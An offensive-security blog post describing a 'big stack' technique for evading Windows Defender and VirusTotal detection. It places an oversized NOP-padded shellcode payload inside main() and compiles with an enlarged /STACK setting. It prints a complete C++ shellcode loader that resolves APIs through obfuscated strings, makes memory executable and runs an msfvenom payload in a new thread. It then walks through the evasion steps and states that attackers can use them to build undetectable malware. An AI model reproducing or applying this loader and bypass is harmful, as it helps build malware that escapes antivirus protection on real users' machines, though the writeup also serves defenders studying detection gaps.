Deceiving Defender: The Big Stack Bypass

Defeating Windows Defender detection on Windows 10 by creating a large (>2MB) payload allocated on the stack

Part One: Introduction

I stumbled upon this trick during my demonstration of the byoDLL technique documented in Unholy Unhooking. Basically, the bypass goes like this:
  • The default supported stack size for a program is 1 MB (1024 KB)
  • Variables initiated in main() are stored on the stack at run time
  • If you generate a payload > 1024KB and hard code it in main your payload will fail
  • If you compile with /STACK:*BIG_NUMBER* you'll win

Part Two: Testing it out

We start out with the following code:
#include <windows.h>
#include <stdio.h>
#include <time.h>
#include <random>
​
typedef LPVOID (WINAPI * VirtualAlloc_t)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef BOOL (WINAPI * VirtualProtect_t)(LPVOID, SIZE_T, DWORD, PDWORD);
typedef HANDLE (WINAPI * CreateThread_t)(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, __drv_aliasesMem LPVOID lpParameter, DWORD dwCreationFlags,LPDWORD lpThreadId);
​
unsigned char sVirtualProtect[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t', 0x0 };
unsigned char sVirtualAlloc[] = {'V','i','r','t','u','a','l','A','l','l','o','c',0x0};
unsigned char sCreateThread[] = {'C','r','e','a','t','e','T','h','r','e','a','d',0x0,};
​
//msfvenom calc payload
unsigned char payload[] = { […snip…]};
​
int main(VOID) {
size_t payload_len = sizeof(payload);
void * exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
//function pointers
VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t) GetProcAddress(GetModuleHandle((LPCSTR) "KErnEl32.DLl"), (LPCSTR) sVirtualAlloc);
VirtualProtect_t VirtualProtect_p = (VirtualProtect_t) GetProcAddress(GetModuleHandle((LPCSTR) "kErnEl32.DLl"), (LPCSTR) sVirtualProtect);
CreateThread_t CreateThread_p = (CreateThread_t) GetProcAddress(GetModuleHandle((LPCSTR) "kERnEl32.DLl"), (LPCSTR) sCreateThread);
// Allocate a memory buffer for payload
exec_mem = VirtualAlloc_p(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
​
// Copy payload to program memory ; this gets inlined
RtlMoveMemory(exec_mem, payload, payload_len);
// Make payload executable
rv = VirtualProtect_p(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
​
printf("\nLaunch Payload?\n");
getchar();
​
// Run payload
if ( rv != 0 ) {
th = CreateThread_p(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
WaitForSingleObject(th, INFINITE);
}
return 0;
}c++
If we compile this and move the executable to our test directory, we can expect to get detected.
ThreatCheck helps us out with that so we don't waste too much time validating what we already know.

Part Three: the cool part

BUT! If we move the payload inside of main, and front load it with NOPs (> 1024KB worth, you can generate this using any method of your choice, I prefer python), and compile with the, something interesting will happen.
Your code should like something like this now.
Everything should compile, but your program will fail to run!
If we look at the program with x64Dbg, we can see that we end up overflowing our own stack during execution!
Lets compile with the /STACK:2000000000 set, which should give us plenty of space to put everything we need on the stack at run time.
It works!
ThreatCheck still finds our payload though…?
Lets make it a 2KB payload, and 3KB stack. The implant comes in at over 16MB, but if we drag and drop the implant into our test folder…

Part Four: ???

[Intentionally left blank]

Part Five: Profit

We survive!
We double check our survivability with ThreatCheck.
And we can run it from our test folder without being detected by Windows Defender!
But if we move the payload outside of main and into the data section of our program, it will once again be detected by Defender.
It's also not a matter of file size, we can append some trash data to our detectable implant and it will still be detected.

Part Six: Conclusion

In this writeup, we demonstrated Windows Defender's inability to detect programs with large stacks, allowing determined attackers to craft undetectable malware so long as the payload is initialized in the .text section of the program.
​
The downside to this approach is that your executable file is huge by payload delivery standards. Deploying this technique in a development environment can get a little tedious as well. You can expect a lot of application crashes and the compile time for this approach is significantly longer than other methods. Nonetheless, this provides another potential avenue of attack for malicious actors and defenders should be aware of it.

Part Seven: Encore

Totally by chance I had the thought to upload this to VirusTotal as well, and look what we found.
If you only use the implant code without the bypass, you can expect something like this:
Apparently large stack usage breaks a lot of automated analysis. Who knew. This artical probably also belongs in my ZeroTotal series lol

References: